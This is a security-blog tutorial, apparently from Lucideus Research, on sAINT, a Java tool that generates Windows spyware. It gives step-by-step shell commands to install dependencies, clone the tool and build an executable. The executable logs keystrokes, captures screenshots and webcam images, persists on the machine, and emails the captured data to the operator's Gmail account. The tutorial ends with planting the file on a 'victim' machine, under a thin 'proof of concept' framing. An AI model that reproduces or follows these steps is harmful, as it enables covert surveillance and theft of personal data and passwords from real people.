SAINT A Powerful Windows Spyware Generator | Lucideus Research

Introduction
(s)AINT is a Linux based Spyware Generator for Windows system written in Java.

sAINT provide following features:
  • Keyloggers
  • Take Screenshots
  • Webcam Capture
  • Persistence
Lab Environment
  • Target Machine: Windows 7 Professional x64bit
  • Java JRE 8 on windows is required

Proof of Concept

Step 1:
First of all we need to install dependencies (Maven and JDK 8 package) 

Open terminal and write

$ apt install maven default-jdk default-jre openjdk-8-jdk openjdk-8-jre –y

$ apt install zlib1g-dev libncurses5-dev lib32z1 lib32ncurses5 –y

Step 2: Clone this repository

$ git clone https://github.com/tiagorlampert/sAINT.git

Step 3: Navigate to sAINT directory

$ cd sAINT
$ ls

Step 4: Provide executable permissions 
$ chmod +x configure.sh
        $ ls
        $ ./configure.sh

Step 5: Run sAINT.jar 
             $ java -jar sAINT.jar


Press enter to continue
Enter your GMAIL id: [youremailid]
Enter your Password: xxxxxxxxxxxxxxxx
Enable Screenshot (Y/n): Y
Enable Webcam (Y/n): Y
Enable Persistence (Y/n): Y
Enter the number of character to send E-mail: 10

The information above is correct? (y/n): Y
You would like to generate .EXE using lauch4j? (y/n): Y
The generated .exe can be found in target/ folder


Note:
You must have to allow access to less secure apps on your gmail account

Follow the link : https://www.google.com/settings/security/lesssecureapps

And then make the button go blue of Allow less secure apps: OFF → ON





Step 6: Now move to target machine

  • Deploy both file which we had found inside target folder of sAINT directory
  • Install Java Jre 8 or the rolling version in our target machine. It’s essential for our spyware to work

Why does the .EXE need java on target machine to run?
The JRE is required and the executable will not work without it. Because the Windows need JRE for translating the program from java byte code to machine language.
  • Our target machine is ready to run our spyware.
  • Double click .jar file and our job is done. It’s a self extracting jar file 

We will start receiving the email. Since, we had set the character limit to 10 we will receive a email in our inbox soon after the victim will press key strokes.

Character limit can be set according for our need.







Reference: 
https://github.com/tiagorlampert/sAINT